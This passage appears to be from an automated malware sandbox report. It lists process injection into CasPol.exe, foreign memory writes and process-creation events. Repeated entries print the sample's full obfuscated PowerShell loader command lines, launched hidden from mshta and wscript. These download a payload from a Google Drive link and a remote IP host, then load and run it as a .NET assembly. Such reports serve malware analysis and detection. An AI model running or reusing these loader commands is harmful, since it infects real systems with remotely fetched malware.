hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: NULL target: unknown protection: execute and read and write

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 459000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 471000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 477000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 478000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 479000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47E000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 7EFDE008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jfhetklvvk0yvtjqicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagieferc10exbficagicagicagicagicagicagicagicagicagicagicaglu1fbujfcmrlrmlosvrjt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbu9uiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagd0xbywd3b3csc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagbixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbhumosdwludcagicagicagicagicagicagicagicagicagicagicagigd3ccxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbxdlcpoycgicagicagicagicagicagicagicagicagicagicagicattmftzsagicagicagicagicagicagicagicagicagicagicagicjizutsqxf0qweiicagicagicagicagicagicagicagicagicagicagicaglw5hbwvtcgfdzsagicagicagicagicagicagicagicagicagicagicagihb1tlfcdkdfdsagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakwerosvvwttjvmla6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xmdcumtc0lje0ni40ni81ny9wawn0dxjld2l0agdyzwf0bmv3c3dpdghnb29kdghpbmdzb25izxn0cgxhy2uudelgiiwijevuvjpbufbeqvrbxhbpy3r1cmv3axroz3jlyxruzxdzd2l0agdvb2r0agluz3nvbmjllnzicyismcwwktttvefydc1zbgvlccgzktttdgfydcagicagicagicagicagicagicagicagicagicagicagicikzw52okfquerbvefccgljdhvyzxdpdghncmvhdg5ld3n3axroz29vzhroaw5nc29uymuudmjzig=='+[char]34+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjhbzsg9nrvsymv0rjfbzae9trvszmf0rj3gnksgoj1prywltywdlvxjsid0guun4ahqnkyd0chm6ly9kcml2zs5nb29nbguuy29tl3vjp2v4cg9ydd1kb3dubg9hzczpzd0xqulwz0pksnyxrjynkyd2uzrzvu95ym5ilxnedlvoqll3dxiguun4o1pryxdlyknsawvudca9ie5ldy1pymply3qgu3knkydzdgvtlk5ldc5xzwjdbgllbnq7wmthaw1hz2vcjysnexrlcya9ifpryxdlyknsawvudc5eb3dubg9hzerhdgeowmthaw1hz2vvcmwpo1prywltywdlvgv4dca9ifttexn0jysnzw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkfprywltywdlqnl0zxmpo1pryxn0yxj0rmxhzya9iffdedwnkyc8qkftrty0x1nuqvjupj5rq3g7wmthzw5krmxhzya9iffdedw8qkftrty0x0vord4+uun4o1pryxn0yxj0sw5kzxggpsbaa2fpbwfnzvrlehqusw5kzxhpzihaa2fzdgfydezsywcpo1prywvuzeluzgv4id0gwmthaw1hz2vuzxh0lkluzgv4t2yowmthzw5krmxhzycrjyk7wmthc3rhcnrjbmrlecatz2ugmcatyw4nkydkifprywvuzeluzgv4ic1ndcbajysna2fzdccrj2fydeluzgv4o1pryxn0yxj0sw4nkydkzxggkz0gwmthc3rhcnrgbgfnlkxlbmd0adtaa2fiyxnlnjrmzw5ndggnkycgpsbaa2flbmrjbmrlecatifpryxn0yxj0sw5kzxg7wmthymfzzty0q29tbwfuzca9ifprywltywdlvgv4dc5tdwjzdhjpbicrj2cowmthc3rhcnrjbmrlecwgjysnwmthymfzjysnzty0tgvuz3rokttaa2fiyxnlnjrszxzlcnnlzca9ic1qb2luichaa2fiyxnlnjrdb21tyw5kllrvq2hhckfycmf5kckgs041iezvckvhy2gtt2jqzwn0ihsgwmsnkydhxyb9kvstms4ulshaa2fijysnyxmnkydlnjrdb21tyw5klkxlbmd0acldo1prywnvbw1hbmrcexrlcya9ifttexn0zw0ujysnq29udmvydf06okzyb21cyxnljysnnjrtdhjpbmcowmthymfzzty0umv2zxjzzwqpo1prywxvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzchaa2fjb21tyscrj25kqnl0zxmpo1pryxzhau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzscrj3rnzxrob2qouun4vkfjuun4kttaa2f2ywlnzxrob2qusw52b2tlkfpryw51bgwsieaouun4dhh0lljsrlzhr0zslzc1lzy0ljy0ms40nzeunzaxly86chr0affdecwguun4zgvzyxrpdmfkb1fdecwguumnkyd4zgvzyxrpdmfkb1fdecwguun4zgvzyxrpdmfkb1fdecwguun4q2fzjysnug9suun4lcbrq3hkzxnhdgl2ywrvuscrj0n4lcbrq3hkzxnhdgl2ywrvuun4lffdegrlc2f0axzhzg9rq3gsuun4zgvzyxrpdmfkb1fdecxrq3hkzxnhdgl2ywrvuun4lffdegrlc2f0axzhzg9rq3gsuun4zgvzyxrpdmfkb1fdecxrq3gxuun4lffdegrlc2f0axzhzg9rq3gpktsnks5yrvbmyunlkchby0hhul05mctby0hhul0xmdcrw2niyvjdotcplftzvhjjbmddw2niyvjdmzyplnjfuexhq2uoj0tonscsw3nuckluz11by0hhul0xmjqplnjfuexhq2uokftjsgfsxtgxk1tjsgfsxty3k1tjsgfsxteymcksw3nuckluz11by0hhul0zoskp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $pshome[21]+$pshome[30]+'x')(('zkaimageurl = qcxht'+'tps://drive.google.com/uc?export=download&id=1aivgjjjv1f6'+'vs4suoybnh-sdvuhbywur qcx;zkawebclient = new-object sy'+'stem.net.webclient;zkaimageb'+'ytes = zkawebclient.downloaddata(zkaimageurl);zkaimagetext = [syst'+'em.text.encoding]::utf8.getstring(zkaimagebytes);zkastartflag = qcx<'+'<base64_start>>qcx;zkaendflag = qcx<<base64_end>>qcx;zkastartindex = zkaimagetext.indexof(zkastartflag);zkaendindex = zkaimagetext.indexof(zkaendflag'+');zkastartindex -ge 0 -an'+'d zkaendindex -gt z'+'kast'+'artindex;zkastartin'+'dex += zkastartflag.length;zkabase64length'+' = zkaendindex - zkastartindex;zkabase64command = zkaimagetext.substrin'+'g(zkastartindex, '+'zkabas'+'e64length);zkabase64reversed = -join (zkabase64command.tochararray() kn5 foreach-object { zk'+'a_ })[-1..-(zkab'+'as'+'e64command.length)];zkacommandbytes = [system.'+'convert]::frombase'+'64string(zkabase64reversed);zkaloadedassembly = [system.reflection.assembly]::load(zkacomma'+'ndbytes);zkavaimethod = [dnlib.io.home].ge'+'tmethod(qcxvaiqcx);zkavaimethod.invoke(zkanull, @(qcxtxt.rrfvggfr/75/64.641.471.701//:ptthqcx, qcxdesativadoqcx, qc'+'xdesativadoqcx, qcxdesativadoqcx, qcxcas'+'polqcx, qcxdesativadoq'+'cx, qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcx1qcx,qcxdesativadoqcx));').replace(([char]90+[char]107+[char]97),[string][char]36).replace('kn5',[string][char]124).replace(([char]81+[char]67+[char]120),[string][char]39))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jfhetklvvk0yvtjqicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagieferc10exbficagicagicagicagicagicagicagicagicagicagicaglu1fbujfcmrlrmlosvrjt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbu9uiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagd0xbywd3b3csc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagbixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbhumosdwludcagicagicagicagicagicagicagicagicagicagicagigd3ccxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbxdlcpoycgicagicagicagicagicagicagicagicagicagicagicattmftzsagicagicagicagicagicagicagicagicagicagicagicjizutsqxf0qweiicagicagicagicagicagicagicagicagicagicagicaglw5hbwvtcgfdzsagicagicagicagicagicagicagicagicagicagicagihb1tlfcdkdfdsagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakwerosvvwttjvmla6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xmdcumtc0lje0ni40ni81ny9wawn0dxjld2l0agdyzwf0bmv3c3dpdghnb29kdghpbmdzb25izxn0cgxhy2uudelgiiwijevuvjpbufbeqvrbxhbpy3r1cmv3axroz3jlyxruzxdzd2l0agdvb2r0agluz3nvbmjllnzicyismcwwktttvefydc1zbgvlccgzktttdgfydcagicagicagicagicagicagicagicagicagicagicagicikzw52okfquerbvefccgljdhvyzxdpdghncmvhdg5ld3n3axroz29vzhroaw5nc29uymuudmjzig=='+[char]34+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjhbzsg9nrvsymv0rjfbzae9trvszmf0rj3gnksgoj1prywltywdlvxjsid0guun4ahqnkyd0chm6ly9kcml2zs5nb29nbguuy29tl3vjp2v4cg9ydd1kb3dubg9hzczpzd0xqulwz0pksnyxrjynkyd2uzrzvu95ym5ilxnedlvoqll3dxiguun4o1pryxdlyknsawvudca9ie5ldy1pymply3qgu3knkydzdgvtlk5ldc5xzwjdbgllbnq7wmthaw1hz2vcjysnexrlcya9ifpryxdlyknsawvudc5eb3dubg9hzerhdgeowmthaw1hz2vvcmwpo1prywltywdlvgv4dca9ifttexn0jysnzw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkfprywltywdlqnl0zxmpo1pryxn0yxj0rmxhzya9iffdedwnkyc8qkftrty0x1nuqvjupj5rq3g7wmthzw5krmxhzya9iffdedw8qkftrty0x0vord4+uun4o1pryxn0yxj0sw5kzxggpsbaa2fpbwfnzvrlehqusw5kzxhpzihaa2fzdgfydezsywcpo1prywvuzeluzgv4id0gwmthaw1hz2vuzxh0lkluzgv4t2yowmthzw5krmxhzycrjyk7wmthc3rhcnrjbmrlecatz2ugmcatyw4nkydkifprywvuzeluzgv4ic1ndcbajysna2fzdccrj2fydeluzgv4o1pryxn0yxj0sw4nkydkzxggkz0gwmthc3rhcnrgbgfnlkxlbmd0adtaa2fiyxnlnjrmzw5ndggnkycgpsbaa2flbmrjbmrlecatifpryxn0yxj0sw5kzxg7wmthymfzzty0q29tbwfuzca9ifprywltywdlvgv4dc5tdwjzdhjpbicrj2cowmthc3rhcnrjbmrlecwgjysnwmthymfzjysnzty0tgvuz3rokttaa2fiyxnlnjrszxzlcnnlzca9ic1qb2luichaa2fiyxnlnjrdb21tyw5kllrvq2hhckfycmf5kckgs041iezvckvhy2gtt2jqzwn0ihsgwmsnkydhxyb9kvstms4ulshaa2fijysnyxmnkydlnjrdb21tyw5klkxlbmd0acldo1prywnvbw1hbmrcexrlcya9ifttexn0zw0ujysnq29udmvydf06okzyb21cyxnljysnnjrtdhjpbmcowmthymfzzty0umv2zxjzzwqpo1prywxvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzchaa2fjb21tyscrj25kqnl0zxmpo1pryxzhau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzscrj3rnzxrob2qouun4vkfjuun4kttaa2f2ywlnzxrob2qusw52b2tlkfpryw51bgwsieaouun4dhh0lljsrlzhr0zslzc1lzy0ljy0ms40nzeunzaxly86chr0affdecwguun4zgvzyxrpdmfkb1fdecwguumnkyd4zgvzyxrpdmfkb1fdecwguun4zgvzyxrpdmfkb1fdecwguun4q2fzjysnug9suun4lcbrq3hkzxnhdgl2ywrvuscrj0n4lcbrq3hkzxnhdgl2ywrvuun4lffdegrlc2f0axzhzg9rq3gsuun4zgvzyxrpdmfkb1fdecxrq3hkzxnhdgl2ywrvuun4lffdegrlc2f0axzhzg9rq3gsuun4zgvzyxrpdmfkb1fdecxrq3gxuun4lffdegrlc2f0axzhzg9rq3gpktsnks5yrvbmyunlkchby0hhul05mctby0hhul0xmdcrw2niyvjdotcplftzvhjjbmddw2niyvjdmzyplnjfuexhq2uoj0tonscsw3nuckluz11by0hhul0xmjqplnjfuexhq2uokftjsgfsxtgxk1tjsgfsxty3k1tjsgfsxteymcksw3nuckluz11by0hhul0zoskp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $pshome[21]+$pshome[30]+'x')(('zkaimageurl = qcxht'+'tps://drive.google.com/uc?export=download&id=1aivgjjjv1f6'+'vs4suoybnh-sdvuhbywur qcx;zkawebclient = new-object sy'+'stem.net.webclient;zkaimageb'+'ytes = zkawebclient.downloaddata(zkaimageurl);zkaimagetext = [syst'+'em.text.encoding]::utf8.getstring(zkaimagebytes);zkastartflag = qcx<'+'<base64_start>>qcx;zkaendflag = qcx<<base64_end>>qcx;zkastartindex = zkaimagetext.indexof(zkastartflag);zkaendindex = zkaimagetext.indexof(zkaendflag'+');zkastartindex -ge 0 -an'+'d zkaendindex -gt z'+'kast'+'artindex;zkastartin'+'dex += zkastartflag.length;zkabase64length'+' = zkaendindex - zkastartindex;zkabase64command = zkaimagetext.substrin'+'g(zkastartindex, '+'zkabas'+'e64length);zkabase64reversed = -join (zkabase64command.tochararray() kn5 foreach-object { zk'+'a_ })[-1..-(zkab'+'as'+'e64command.length)];zkacommandbytes = [system.'+'convert]::frombase'+'64string(zkabase64reversed);zkaloadedassembly = [system.reflection.assembly]::load(zkacomma'+'ndbytes);zkavaimethod = [dnlib.io.home].ge'+'tmethod(qcxvaiqcx);zkavaimethod.invoke(zkanull, @(qcxtxt.rrfvggfr/75/64.641.471.701//:ptthqcx, qcxdesativadoqcx, qc'+'xdesativadoqcx, qcxdesativadoqcx, qcxcas'+'polqcx, qcxdesativadoq'+'cx, qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcx1qcx,qcxdesativadoqcx));').replace(([char]90+[char]107+[char]97),[string][char]36).replace('kn5',[string][char]124).replace(([char]81+[char]67+[char]120),[string][char]39))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jfhetklvvk0yvtjqicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagieferc10exbficagicagicagicagicagicagicagicagicagicagicaglu1fbujfcmrlrmlosvrjt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbu9uiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagd0xbywd3b3csc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagbixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbhumosdwludcagicagicagicagicagicagicagicagicagicagicagigd3ccxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbxdlcpoycgicagicagicagicagicagicagicagicagicagicagicattmftzsagicagicagicagicagicagicagicagicagicagicagicjizutsqxf0qweiicagicagicagicagicagicagicagicagicagicagicaglw5hbwvtcgfdzsagicagicagicagicagicagicagicagicagicagicagihb1tlfcdkdfdsagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakwerosvvwttjvmla6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xmdcumtc0lje0ni40ni81ny9wawn0dxjld2l0agdyzwf0bmv3c3dpdghnb29kdghpbmdzb25izxn0cgxhy2uudelgiiwijevuvjpbufbeqvrbxhbpy3r1cmv3axroz3jlyxruzxdzd2l0agdvb2r0agluz3nvbmjllnzicyismcwwktttvefydc1zbgvlccgzktttdgfydcagicagicagicagicagicagicagicagicagicagicagicikzw52okfquerbvefccgljdhvyzxdpdghncmvhdg5ld3n3axroz29vzhroaw5nc29uymuudmjzig=='+[char]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjhbzsg9nrvsymv0rjfbzae9trvszmf0rj3gnksgoj1prywltywdlvxjsid0guun4ahqnkyd0chm6ly9kcml2zs5nb29nbguuy29tl3vjp2v4cg9ydd1kb3dubg9hzczpzd0xqulwz0pksnyxrjynkyd2uzrzvu95ym5ilxnedlvoqll3dxiguun4o1pryxdlyknsawvudca9ie5ldy1pymply3qgu3knkydzdgvtlk5ldc5xzwjdbgllbnq7wmthaw1hz2vcjysnexrlcya9ifpryxdlyknsawvudc5eb3dubg9hzerhdgeowmthaw1hz2vvcmwpo1prywltywdlvgv4dca9ifttexn0jysnzw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkfprywltywdlqnl0zxmpo1pryxn0yxj0rmxhzya9iffdedwnkyc8qkftrty0x1nuqvjupj5rq3g7wmthzw5krmxhzya9iffdedw8qkftrty0x0vord4+uun4o1pryxn0yxj0sw5kzxggpsbaa2fpbwfnzvrlehqusw5kzxhpzihaa2fzdgfydezsywcpo1prywvuzeluzgv4id0gwmthaw1hz2vuzxh0lkluzgv4t2yowmthzw5krmxhzycrjyk7wmthc3rhcnrjbmrlecatz2ugmcatyw4nkydkifprywvuzeluzgv4ic1ndcbajysna2fzdccrj2fydeluzgv4o1pryxn0yxj0sw4nkydkzxggkz0gwmthc3rhcnrgbgfnlkxlbmd0adtaa2fiyxnlnjrmzw5ndggnkycgpsbaa2flbmrjbmrlecatifpryxn0yxj0sw5kzxg7wmthymfzzty0q29tbwfuzca9ifprywltywdlvgv4dc5tdwjzdhjpbicrj2cowmthc3rhcnrjbmrlecwgjysnwmthymfzjysnzty0tgvuz3rokttaa2fiyxnlnjrszxzlcnnlzca9ic1qb2luichaa2fiyxnlnjrdb21tyw5kllrvq2hhckfycmf5kckgs041iezvckvhy2gtt2jqzwn0ihsgwmsnkydhxyb9kvstms4ulshaa2fijysnyxmnkydlnjrdb21tyw5klkxlbmd0acldo1prywnvbw1hbmrcexrlcya9ifttexn0zw0ujysnq29udmvydf06okzyb21cyxnljysnnjrtdhjpbmcowmthymfzzty0umv2zxjzzwqpo1prywxvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzchaa2fjb21tyscrj25kqnl0zxmpo1pryxzhau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzscrj3rnzxrob2qouun4vkfjuun4kttaa2f2ywlnzxrob2qusw52b2tlkfpryw51bgwsieaouun4dhh0lljsrlzhr0zslzc1lzy0ljy0ms40nzeunzaxly86chr0affdecwguun4zgvzyxrpdmfkb1fdecwguumnkyd4zgvzyxrpdmfkb1fdecwguun4zgvzyxrpdmfkb1fdecwguun4q2fzjysnug9suun4lcbrq3hkzxnhdgl2ywrvuscrj0n4lcbrq3hkzxnhdgl2ywrvuun4lffdegrlc2f0axzhzg9rq3gsuun4zgvzyxrpdmfkb1fdecxrq3hkzxnhdgl2ywrvuun4lffdegrlc2f0axzhzg9rq3gsuun4zgvzyxrpdmfkb1fdecxrq3gxuun4lffdegrlc2f0axzhzg9rq3gpktsnks5yrvbmyunlkchby0hhul05mctby0hhul0xmdcrw2niyvjdotcplftzvhjjbmddw2niyvjdmzyplnjfuexhq2uoj0tonscsw3nuckluz11by0hhul0xmjqplnjfuexhq2uokftjsgfsxtgxk1tjsgfsxty3k1tjsgfsxteymcksw3nuckluz11by0hhul0zoskp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $pshome[21]+$pshome[30]+'x')(('zkaimageurl = qcxht'+'tps://drive.google.com/uc?export=download&id=1aivgjjjv1f6'+'vs4suoybnh-sdvuhbywur qcx;zkawebclient = new-object sy'+'stem.net.webclient;zkaimageb'+'ytes = zkawebclient.downloaddata(zkaimageurl);zkaimagetext = [syst'+'em.text.encoding]::utf8.getstring(zkaimagebytes);zkastartflag = qcx<'+'<base64_start>>qcx;zkaendflag = qcx<<base64_end>>qcx;zkastartindex = zkaimagetext.indexof(zkastartflag);zkaendindex = zkaimagetext.indexof(zkaendflag'+');zkastartindex -ge 0 -an'+'d zkaendindex -gt z'+'kast'+'artindex;zkastartin'+'dex += zkastartflag.length;zkabase64length'+' = zkaendindex - zkastartindex;zkabase64command = zkaimagetext.substrin'+'g(zkastartindex, '+'zkabas'+'e64length);zkabase64reversed = -join (zkabase64command.tochararray() kn5 foreach-object { zk'+'a_ })[-1..-(zkab'+'as'+'e64command.length)];zkacommandbytes = [system.'+'convert]::frombase'+'64string(zkabase64reversed);zkaloadedassembly = [system.reflection.assembly]::load(zkacomma'+'ndbytes);zkavaimethod = [dnlib.io.home].ge'+'tmethod(qcxvaiqcx);zkavaimethod.invoke(zkanull, @(qcxtxt.rrfvggfr/75/64.641.471.701//:ptthqcx, qcxdesativadoqcx, qc'+'xdesativadoqcx, qcxdesativadoqcx, qcxcas'+'polqcx, qcxdesativadoq'+'cx, qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcx1qcx,qcxdesativadoqcx));').replace(([char]90+[char]107+[char]97),[string][char]36).replace('kn5',[string][char]124).replace(([char]81+[char]67+[char]120),[string][char]39))"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jfhetklvvk0yvtjqicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagieferc10exbficagicagicagicagicagicagicagicagicagicagicaglu1fbujfcmrlrmlosvrjt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbu9uiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagd0xbywd3b3csc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagbixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbhumosdwludcagicagicagicagicagicagicagicagicagicagicagigd3ccxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbxdlcpoycgicagicagicagicagicagicagicagicagicagicagicattmftzsagicagicagicagicagicagicagicagicagicagicagicjizutsqxf0qweiicagicagicagicagicagicagicagicagicagicagicaglw5hbwvtcgfdzsagicagicagicagicagicagicagicagicagicagicagihb1tlfcdkdfdsagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakwerosvvwttjvmla6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xmdcumtc0lje0ni40ni81ny9wawn0dxjld2l0agdyzwf0bmv3c3dpdghnb29kdghpbmdzb25izxn0cgxhy2uudelgiiwijevuvjpbufbeqvrbxhbpy3r1cmv3axroz3jlyxruzxdzd2l0agdvb2r0agluz3nvbmjllnzicyismcwwktttvefydc1zbgvlccgzktttdgfydcagicagicagicagicagicagicagicagicagicagicagicikzw52okfquerbvefccgljdhvyzxdpdghncmvhdg5ld3n3axroz29vzhroaw5nc29uymuudmjzig=='+[char]34+'))')))"
